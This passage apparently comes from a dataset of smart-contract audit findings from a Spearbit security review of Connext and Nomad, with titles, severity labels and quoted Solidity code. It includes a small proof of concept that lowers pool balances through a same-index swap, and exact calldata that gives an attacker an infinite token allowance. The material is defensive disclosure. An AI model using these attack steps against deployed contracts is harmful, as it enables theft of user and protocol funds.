StableSwapFacet has the function swapExactOut() where a user could supply the same as- setIn address as assetOut, which means the TokenIndexes for tokenIndexFrom and tokenIndexTo function swapOut() are the same. In function swapOut() a temporay array is used to store balances. When updating such balances, first self.balances[tokenIndexFrom] is updated and then self.balances[tokenIndexTo] is updated afterwards. However when tokenIndexFrom == tokenIndexTo the second update overwrites the first update, causing token balances to be arbitrarily lowered. This also skews the exchange rates, allowing for swaps where value can be extracted. Note: the protection against this problem is location in function getY(). However, this function is not called from swapOut(). Note: the same issue exists in swapInternalOut(), which is called from swapFromLocalAssetIfNeededForEx- actOut() via _swapAssetOut(). However, via this route it is not possible to specify arbitrary token indexes. There- fore, there isnt an immediate risk here. 7 contract StableSwapFacet is BaseConnextFacet { ... function swapExactOut(... ,address assetIn, address assetOut, ... ) ... { return s.swapStorages[canonicalId].swapOut( getSwapTokenIndex(canonicalId, assetIn), getSwapTokenIndex(canonicalId, assetOut), amountOut, maxAmountIn // assetIn could be same as assetOut ); } ... } library SwapUtils { function swapOut(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... uint256[] memory balances = self.balances; ... self.balances[tokenIndexFrom] = balances[tokenIndexFrom].add(dx).sub(dxAdminFee); self.balances[tokenIndexTo] = balances[tokenIndexTo].sub(dy); // overwrites previous update if ,! From==To ... } function getY(..., uint8 tokenIndexFrom, uint8 tokenIndexTo, ... ) ... { ... require(tokenIndexFrom != tokenIndexTo, \"compare token to itself\"); // here is the protection ... } } Below is a proof of concept which shows that the balances of index 3 can be arbitrarily reduced. //SPDX-License-Identifier: MIT pragma solidity 0.8.14; import \"hardhat/console.sol\"; contract test { uint[] balances = new uint[](10); function swap(uint8 tokenIndexFrom,uint8 tokenIndexTo,uint dx) public { uint dy=dx; // simplified uint256[] memory mbalances = balances; balances[tokenIndexFrom] = mbalances[tokenIndexFrom] + dx; balances[tokenIndexTo] = mbalances[tokenIndexTo] - dy; } constructor() { balances[3] = 100; swap(3,3,10); console.log(balances[3]); // 90 } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Critical Risk" + ] + }, + { + "title": "Use of spot price in SponsorVault leads to sandwich attack.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "There is a special role sponsor in the protocol. Sponsors can cover the liquidity fee and transfer fee for users, making it more favorable for users to migrate to the new chain. Sponsors can either provide liquidity for each adopted token or provide the native token in the SponsorVault. If the native token is provided, the SponsorVault will swap to the adopted token before transferring it to users. contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { ... function reimburseLiquidityFees( address _token, uint256 _liquidityFee, address _receiver ) external override onlyConnext returns (uint256) { ... uint256 amountIn = tokenExchange.getInGivenExpectedOut(_token, _liquidityFee); amountIn = currentBalance >= amountIn ? amountIn : currentBalance; // sponsored fee may end being less than _liquidityFee due to slippage sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); ... } } The spot AMM price is used when doing the swap. Attackers can manipulate the value of getInGivenExpectedOut and make SponsorVault sell the native token at a bad price. By executing a sandwich attack the exploiters can drain all native tokens in the sponsor vault. For the sake of the following example, assume that _token is USDC and native token is ETH, the sponsor tries to sponsor 100 usdc to the users: Attacker first manipulates the DEX and makes the exchange of 1 ETH = 0.1 USDC. getInGivenExpectedOut returns 100 / 0.1 = 1000. tokenExchange.swapExactIn buys 100 USDC with 1000 ETH, causing the ETH price to decrease even lower. Attacker buys ETH at a lower prices and realizes a profit.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Critical Risk" + ] + }, + { + "title": "Configuration is crucial (both Nomad and Connext)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The Connext and Nomad protocol rely heavily on configuration parameters. These parameters are configured during deployment time and are updated afterwards. Configuration errors can have major conse- quences. Examples of important configurations are: BridgeFacet.sol: s.promiseRouter. BridgeFacet.sol: s.connextions. BridgeFacet.sol: s.approvedSequencers. Router.sol: remotes[]. xAppConnectionManager.sol: home . xAppConnectionManager.sol: replicaToDomain[]. xAppConnectionManager.sol: domainToReplica[].", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Deriving price with balanceOf is dangerous", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "getPriceFromDex derives the price by querying the balance of AMMs pools. function getPriceFromDex(address _tokenAddress) public view returns (uint256) { PriceInfo storage priceInfo = priceRecords[_tokenAddress]; ... uint256 rawTokenAmount = IERC20Extended(priceInfo.token).balanceOf(priceInfo.lpToken); ... uint256 rawBaseTokenAmount = IERC20Extended(priceInfo.baseToken).balanceOf(priceInfo.lpToken); ... } Deriving the price with balanceOf is dangerous as balanceOf may be gamed. Consider univ2 as an example; Exploiters can first send tokens into the pool and pump the price, then absorb the tokens that were previously donated by calling mint.", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Routers can sybil attack the sponsor vault to drain funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When funds are bridged from source to destination chain messages must first go through optimistic verification before being executed on the destination BridgeFacet.sol contract. Upon transfer processing the contract checks if the domain is sponsored. If such is the case then the user is reimbursed for both liquidity fees paid when the transfer was initiated and for the fees paid to the relayer during message propagation. There currently isnt any mechanism to detect sybil attacks. Therefore, a router can perform several large value transfers in an effort to drain the sponsor vault of its funds. Because liquidity fees are paid to the router by a user connected to the router, there isnt any value lost in this type of attack.", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Routers are exposed to extreme slippage if they attempt to repay debt before being reconciled", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When routers are reconciled, the local asset may need to be exchanged for the adopted asset in order to repay the unbacked Aave loan. AssetLogic.swapFromLocalAssetIfNeededForExactOut() takes two key arguments: _amount representing exactly how much of the adopted asset should be received. _maxIn which is used to limit slippage and limit how much of the local asset is used in the swap. Upon failure to swap, the protocol will reset the values for unbacked Aave debt and distribute local tokens to the router. However, if this router partially paid off some of the unbacked Aave debt before being reconciled, _maxIn will diverge from _amount, allowing value to be extracted in the form of slippage. As a result, routers may receive less than the amount of liquidity they initially provided, leading to router insolvency.", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Malicious call data can DOS execute", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "An attacker can DOS the executor contract by giving infinite allowance to normal users. Since the executor increases allowance before triggering an external call, the tx will always revert if the allowance is already infinite. 11 function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes ,! memory) { ... if (!isNative && hasValue) { SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); // reverts if set to `infinite` before } ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall(...) // can set to `infinite` allowance ... ,! ,! }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "DOS attack on the Nomad Home.sol Contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Upon calling xcall(), a message is dispatched via Nomad. A hash of this message is inserted into the merkle tree and the new root will be added at the end of the queue. Whenever the updater of Home.sol commits to a new root, improperUpdate() will check that the new update is not fraudulent. In doing so, it must iterate through the queue of merkle roots to find the correct committed root. Because anyone can dispatch a message and insert a new root into the queue it is possible to impact the availability of the protocol by preventing honest messages from being included in the updated root. function improperUpdate(..., bytes32 _newRoot, ... ) public notFailed returns (bool) { ... // if the _newRoot is not currently contained in the queue, // slash the Updater and set the contract to FAILED state if (!queue.contains(_newRoot)) { _fail(); ... } ... } function contains(Queue storage _q, bytes32 _item) internal view returns (bool) { for (uint256 i = _q.first; i <= _q.last; i++) { if (_q.queue[i] == _item) { return true; } } return false; }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Upon failing to back unbacked debt _reconcileProcessPortal() will leave the converted asset in the contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When routers front liquidity for the protocols users they are later reconciled once the bridge has optimistically verified transfers from the source chain. Upon being reconciled, the _reconcileProcessPortal() attempts to first pay back Aave debt before distributing the rest back to the router. However, _reconcileProcess- Portal() will not convert the adopted asset back to the local asset in the case where the call to the Aave pool fails. Instead, the function will set amountIn = 0 and continue to distribute the local asset to the router. if (success) { emit AavePortalRepayment(_transferId, adopted, backUnbackedAmount, portalFee); } else { // Reset values s.portalDebt[_transferId] += backUnbackedAmount; s.portalFeeDebt[_transferId] += portalFee; // Decrease the allowance SafeERC20.safeDecreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount); // Update the amount repaid to 0, so the amount is credited to the router amountIn = 0; emit AavePortalRepaymentDebt(_transferId, adopted, s.portalDebt[_transferId], s.portalFeeDebt[_transferId]); ,! }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "_handleExecuteTransaction() doesnt handle native assets correctly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function _handleExecuteTransaction() sends any native tokens to the executor contract first, and then calls s.executor.execute(). This means that within that function msg.value will always be 0. So the associated logic that uses msg.value doesnt work as expected and the function doesnt handle native assets correctly. Note: also see issue \"Executor reverts on receiving native tokens from BridgeFacet\" contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(...)... { ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); (bool success, bytes memory returnData) = s.executor.execute(...); // no native tokens send } } contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... if (isNative && msg.value != _args.amount) { // msg.value is always 0 ... } } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Add checks to xcall()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function xcall() does some sanity checks, nevertheless more checks should be added to prevent issues later on in the use of the protocol. If _args.recovery== 0 then _sendToRecovery() will send funds to the 0 address, effectively losing them. If _params.agent == 0 the forceReceiveLocal cant be used and funds might be locked forever. The _args.params.destinationDomain should never be s.domain, although this is also implicitly checked via _mustHaveRemote() assuming a correct configuration. If _args.params.slippageTol is set to something greater than s.LIQUIDITY_FEE_DENOMINATOR then funds can be locked as xcall() allows for the user to provide the local asset, avoiding any swap while _handleExecuteLiquid- ity() in execute() may attempt to perform a swap on the destination chain. function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) { // Sanity checks. ... } 14", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Executor and AssetLogic deals with the native tokens inconsistently that breaks execute()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When dealing with an external callee the BridgeFacet will transfer liquidity to the Executor before calling Executor.execute. In order to send the native token: The Executor checks for _args.assetId == address(0). AssetLogic.transferAssetFromContract() disallows address(0). Note: also see issue Executor reverts on receiving native tokens from BridgeFacet. 15 contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction() ...{ ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); // _asset may not ,! be 0 (bool success, bytes memory returnData) = s.executor.execute( IExecutor.ExecutorArgs( // assetId parameter from ExecutorArgs // must be 0 for Native asset ... _asset, ... ) ); ... } } library AssetLogic { function transferAssetFromContract( address _assetId, ... ) { ... // No native assets should ever be stored on this contract if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } } } contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... bool isNative = _args.assetId == address(0); ... } } The BridgeFacet cannot handle external callees when using native tokens.", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Executor reverts on receiving native tokens from BridgeFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When doing an external call in execute(), the BridgeFacet provides liquidity into the Executor contract before calling Executor.execute. The BridgeFacet transfers native token when address(wrapper) is provided. The Executor however does not have a fallback/ receive function. Hence, the transaction will revert when the BridgeFacet tries to send the native token to the Executor contract. function _handleExecuteTransaction( ... AssetLogic.transferAssetFromContract(_asset, address(s.executor), _amount); (bool success, bytes memory returnData) = s.executor.execute(...); ... } function transferAssetFromContract(...) ... { ... if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "SponsorVault sponsors full transfer amount in reimburseLiquidityFees()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The BridgeFacet passes args.amount as _liquidityFee when calling reimburseLiquidityFees. Instead of sponsoring liquidityFee, the sponsor vault would sponsor full transfer amount to the reciever. Note: Luckily the amount in reimburseLiquidityFees is capped by relayerFeeCap. function _handleExecuteTransaction(...) ... { ... (bool success, bytes memory data) = address(s.sponsorVault).call( abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, _args.params.to) ); ,! } 17", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Tokens can get stuck in Executor contract if the destination doesnt claim them all", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function execute() increases allowance and then calls the recipient (_args.to). When the recipient does not use all tokens, these could remain stuck inside the Executor contract. Note: the executor can have excess tokens, see: kovan executor. Note: see issue \"Malicious call data can DOS execute or steal unclaimed tokens in the Executor contract\". function execute(...) ... { ... if (!isNative && hasValue) { SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); } ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, ... ); ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "reimburseLiquidityFees send tokens twice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function reimburseLiquidityFees() is called from the BridgeFacet, making the msg.sender within this function to be BridgeFacet. When using tokenExchanges via swapExactIn() tokens are sent to msg.sender, which is the BridgeFacet. Then, tokens are sent again to msg.sender via safeTransfer(), which is also the BridgeFacet. Therefore, tokens end up being sent to the BridgeFacet twice. Note: the check ...balanceOf(...) != starting + sponsored should fail too. Note: The fix in C4 seems to introduce this issue: code4rena-246 18 contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(... ) ... { ... uint256 starting = IERC20(_asset).balanceOf(address(this)); ... (bool success, bytes memory data) = address(s.sponsorVault).call( abi.encodeWithSelector(s.sponsorVault.reimburseLiquidityFees.selector, _asset, _args.amount, ,! _args.params.to) ); if (success) { uint256 sponsored = abi.decode(data, (uint256)); // Validate correct amounts are transferred if (IERC20(_asset).balanceOf(address(this)) != starting + sponsored) { // this should revert BridgeFacet__handleExecuteTransaction_invalidSponsoredAmount(); ,! fail now } ... } ... } } contract SponsorVault is ISponsorVault, ReentrancyGuard, Ownable { function reimburseLiquidityFees(... ) { if (address(tokenExchanges[_token]) != address(0)) { ... sponsoredFee = tokenExchange.swapExactIn{value: amountIn}(_token, msg.sender); // send to ,! msg.sender } else { ... } ... IERC20(_token).safeTransfer(msg.sender, sponsoredFee); // send again to msg.sender } } interface ITokenExchange { /** * @notice Swaps the exact amount of native token being sent for a given token. * @param token The token to receive * @param recipient The recipient of the token * @return The amount of tokens resulting from the swap */ function swapExactIn(address token, address recipient) external payable returns (uint256); }", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Anyone can repay the portalDebt with different tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Routers can provide liquidity in the protocol to improve the UX of cross-chain transfers. Liquidity is sent to users under the routers consent before the cross-chain message is settled on the optimistic message protocol, i.e., Nomad. The router can also borrow liquidity from AAVE if the router does not have enough of it. It is the routers responsibility to repay the debt to AAVE. contract PortalFacet is BaseConnextFacet { function repayAavePortalFor( address _adopted, uint256 _backingAmount, uint256 _feeAmount, bytes32 _transferId ) external payable { address adopted = _adopted == address(0) ? address(s.wrapper) : _adopted; ... // Transfer funds to the contract uint256 total = _backingAmount + _feeAmount; if (total == 0) revert PortalFacet__repayAavePortalFor_zeroAmount(); (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0); ... // repay the loan _backLoan(adopted, _backingAmount, _feeAmount, _transferId); } } The PortalFacet does not check whether _adopted is the correct token in debt. Assume that the protocol borrows ETH for the current _transferId, therefore Router should repay ETH to clear the debt. However, the Router can provide any valid tokens, e.g. DAI, USDC, to clear the debt. This results in the insolvency of the protocol. Note: a similar issue is also present in repayAavePortal().", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Malicious call data can steal unclaimed tokens in the Executor contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Users can provide a destination contract args.to and arbitrary data _args.callData when doing a cross-chain transfer. The protocol will provide the allowance to the callee contract and triggers the function call through ExcessivelySafeCall.excessivelySafeCall. 20 contract Executor is IExecutor { function execute(ExecutorArgs memory _args) external payable override onlyConnext returns (bool, bytes memory) { ,! ... SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); ... // Try to execute the callData // the low level call will return `false` if its execution reverts (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); ... } } Since there arent restrictions on the destination contract and calldata, exploiters can steal the tokens from the executor. Note: the executor does have excess tokens, see: see: kovan executor. Note: see issue Tokens can get stuck in Executor contract. Tokens can be stolen by granting an allowance. Setting calldata = abi.encodeWithSelector(ERC20.approve.selector, exploiter, type(uint256).max); and args.to = tokenAddress allows the exploiter to get an infinite allowance of any token, effectively stealing any unclaimed tokens left in the executor.", + "labels": [ + "Spearbit", + "Connext", + "Severity: High Risk" + ] + }, + { + "title": "Fee-On-Transfer tokens are not explicitly denied in swap()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The swap() function is used extensively within the Connext protocol, primarily when swapping be- tween local and adopted assets. When a swap is performed, the function will check the actual amount transferred. However, this is not consistent with other swap functions which check that the amount transferred is equal to dx. As a result, overwriting dx with tokenFrom.balanceOf(address(this)).sub(beforeBalance) allows for fee-on- transfer tokens to work as intended.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "xcall() may erroneously overwrite prior calls to bumpTransfer()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The bumpTransfer() function allows users to increment the relayer fee on any given transferId without checking if the unique transfer identifier exists. As a result, a subsequent call to xcall() will overwrite the s.relayerFees mapping, leading to lost funds.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "_handleExecuteLiquidity doesnt consistently check for receiveLocalOverrides", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function _handleExecuteLiquidity() initially checks for receiveLocal but does not check for receiveLocalOverrides. Later on it does check for both of values. function _handleExecuteLiquidity(... ) ... { ... if ( !_args.params.receiveLocal && // doesn't check for receiveLocalOverrides s.routerBalances[_args.routers[0]][_args.local] < toSwap && s.aavePool != address(0) ) { ... if (_args.params.receiveLocal || s.receiveLocalOverrides[_transferId]) { // extra check return (toSwap, _args.local); } } 22 As a result, the portal may pay the bridge user in the adopted asset when they opted to override this behaviour to avoid slippage conditions outside of their boundaries, potentially leading to an unwarranted reception of funds denominated in the adopted asset.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "Router signatures can be replayed when executing messages on the destination domain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Connext bridge supports near-instant transfers by allowing users to pay a small fee to routers for providing them with liquidity. Gelato relayers are tasked with taking in bids from liquidity providers who sign a message consisting of the transferId and path length. The path length variable only guarantees that the message they signed will only be valid if _args.routers.length - 1 routers are also selected. However, it does not prevent Gelato relayers from re-using the same signature multiple times. As a result, routers may unintentionally provide more liquidity than expected.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "diamondCut() allows re-execution of old updates", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function diamondCut() of LibDiamond verifies the signed version of the update parameters. It checks the signed version is available and a sufficient amount of time has passed. However it doesnt prevent multiple executions and the signed version stays valid forever. This allows old updates to be executed again. Assume the following: facet_x (or function_y) has value: version_1. then: replace facet_x (or function_y) with version_2. then a bug is found in version_2 and it is rolled back with: replace facet_x (or function_y) with ver- sion_1. 23 then a (malicious) owner could immediately do: replace facet_x (or function_y) with version_2 (be- cause it is still valid). Note: the risk is limited because it can only executed by the contract owner, however this is probably not how the mechanism should work. library LibDiamond { function diamondCut(...) ... { ... uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time < block.timestamp, \"LibDiamond: delay not elapsed\"); ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "Not always safeApprove(..., 0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Some functions like _reconcileProcessPortal of BaseConnextFacet and _swapAssetOut of As- setLogic do safeApprove(..., 0) first. contract NomadFacet is BaseConnextFacet { function _reconcileProcessPortal( ... ) ... { ... // Edge case with some tokens: Example USDT in ETH Mainnet, after the backUnbacked call there ,! could be a remaining allowance if not the whole amount is pulled by aave. // Later, if we try to increase the allowance it will fail. USDT demands if allowance is not 0, ,! it has to be set to 0 first. // Example: ,! ,! [ParaSwapRepayAdapter.sol#L138-L140](https://github.com/aave/aave-v3-periphery/blob/ca184e5278bcbc1 0d28c3dbbc604041d7cfac50b/contracts/adapters/paraswap/ParaSwapRepayAdapter.sol#L138-L140) c SafeERC20.safeApprove(IERC20(adopted), s.aavePool, 0); SafeERC20.safeIncreaseAllowance(IERC20(adopted), s.aavePool, totalRepayAmount); ... } } While the following functions dont do this: xcall of BridgeFacet. _backLoan of PortalFacet. _swapAsset of AssetLogic. execute of Executor. This could result in problems with tokens like USDT. 24 contract BridgeFacet is BaseConnextFacet { ,! function xcall(XCallArgs calldata _args) external payable nonReentrant whenNotPaused returns (bytes32) { ... SafeERC20.safeIncreaseAllowance(IERC20(bridged), address(s.bridgeRouter), bridgedAmt); ... } } contract PortalFacet is BaseConnextFacet { function _backLoan(...) ... { ... SafeERC20Upgradeable.safeIncreaseAllowance(IERC20Upgradeable(_asset), s.aavePool, _backing + ,! _fee); ... } } library AssetLogic { function _swapAsset(...) ... { ... SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); ... } } contract Executor is IExecutor { function execute( ... ) ... { ... SafeERC20.safeIncreaseAllowance(IERC20(_args.assetId), _args.to, _args.amount); ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "_slippageTol does not adjust for decimal differences", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Users set the slippage tolerance in percentage. The assetLogic calculates: minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR Then assetLogic uses minReceived in the swap functions. The minReceived, however, does not adjust for the decimal differences between assetIn and assetOut. Users will either always hit the slippage or suffer huge slippage when assetIn and assetOut have a different number of decimals. Assume the number of decimals of assetIn is 6 and the decimal of assetOut is 18. The minReceived will be set to 10-12 smaller than the correct value. Users would be vulnerable to sandwich attacks in this case. Assume the number of decimals of assetIn is 18 and the number of decimals of assetOut is 6. The minReceived will be set to 1012 larger than the correct value. Users would always hit the slippage and the cross-chain transfer will get stuck. 25 library AssetLogic { function _swapAsset(... ) ... { // Swap the asset to the proper local asset uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR; ... return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut); ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "Canonical assets should be keyed on the hash of domain and id", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "A canonical asset is a tuple of a (domain, id) pair. TokenRegistrys owner has the power to regis- ter new tokens in the system (See TokenRegistry.ensureLocalToken() and TokenRegistry.enrollCustom()). A canonical asset is registered using the hash of its domain and id (See TokenRegistry._setCanonicalToRepre- sentation()). Connext uses only the id of a canonical asset to uniquely identify. Here are a few references: swapStorages canonicalToAdopted It is an issue if TokenRegistry registers two canonical assets with the same id. canonical asset an unintended one might be transferred to the destination chain, of the transfers may revert. If this id fetches the incorrect", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "Missing checks for Chainlink oracle", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "ConnextPriceOracle.getTokenPrice() function goes through a series of oracles. At each step, it has a few validations to avoid incorrect price. If such validations succeed, the function returns the non-zero oracle price. For the Chainlink oracle, getTokenPrice() ultimately calls getPriceFromChainlink() which has the following validation if (answer == 0 || answeredInRound < roundId || updateAt == 0) { // answeredInRound > roundId ===> ChainLink Error: Stale price // updatedAt = 0 ===> ChainLink Error: Round not complete return 0; } updateAt refers to the timestamp of the round. This value isnt checked to make sure it is recent. 26 Additionally, it is important to be aware of the minAnswer and maxAnswer of the Chainlink oracle, these values are not allowed to be reached or surpassed. See Chainlink API reference for documentation on minAnswer and maxAnswer as well as this piece of code: OffchainAggregator.sol", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "Same params.SlippageTol is used in two different swaps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The Connext protocol does a cross-chain transfer with the help of the Nomad protocol. to use the Nomad protocol, Connext has to convert the adopted token into the local token. For a cross-chain transfer, users take up two swaps. Adopted -> Local at the source chain and Local -> Adopted at the destination chain. BridgeFacet.sol#L299-L304 function xcall(XCallArgs calldata _args) external payable whenNotPaused nonReentrant returns (bytes32) { ... // Swap to the local asset from adopted if applicable. (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded( canonical, transactingAssetId, amount, _args.params.slippageTol ); ... } BridgeFacet.sol#L637 function _handleExecuteLiquidity( bytes32 _transferId, bytes32 _canonicalId, bool _isFast, ExecuteArgs calldata _args ) private returns (uint256, address) { ... // swap out of mad* asset into adopted asset if needed return AssetLogic.swapFromLocalAssetIfNeeded(_canonicalId, _args.local, toSwap, _args.params.slippageTol); ,! } The same slippage tolerance _args.params.slippageTol is used in two swaps. In most cases users cannot set the correct slippage tolerance to protect two swaps. Assume the Nomad asset is slightly cheaper in both chains. 1 Nomad asset equals 1.01 adopted asset. An expected swap would be:1 adopted -> 1.01 Nomad asset -> 1 adopted. The right slippage tolerance should be set at 1.01 and 0.98 respectively. Users cannot set the correct tolerance with a single parameter. This makes users vulnerable to MEV searchers. Also, user transfers get stuck during periods of instability.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Medium Risk" + ] + }, + { + "title": "getTokenPrice() returns stale token prices", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "getTokenPrice() reads from the assetPrices[tokenAddress].price mapping which stores the latest price as configured by the protocol admin in setDirectPrice(). However, the check for a stale token price will never fallback to other price oracles as tokenPrice != 0. Therefore, the stale token price will be unintentionally returned.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Potential division by zero if gas token oracle is faulty", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "In the event that the gas token oracle is faulty and returns malformed values, the call to reim- burseRelayerFees() in _handleExecuteTransaction() will fail. Fortunately, the low-level call() function will not prevent the transfer from being executed, however, this may lead to further issues down the line if changes are made to the sponsor vault.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Burn does not lower allowance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function _takeTokens() of BridgeRouter takes in the tokens from the sender. Sometimes it transfers them and sometimes it burns them. In the case of burning the tokens, the allowance isnt \"used up\". 28 function _takeTokens(... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... IERC20(_token).safeTransferFrom(msg.sender, address(this), _amount); 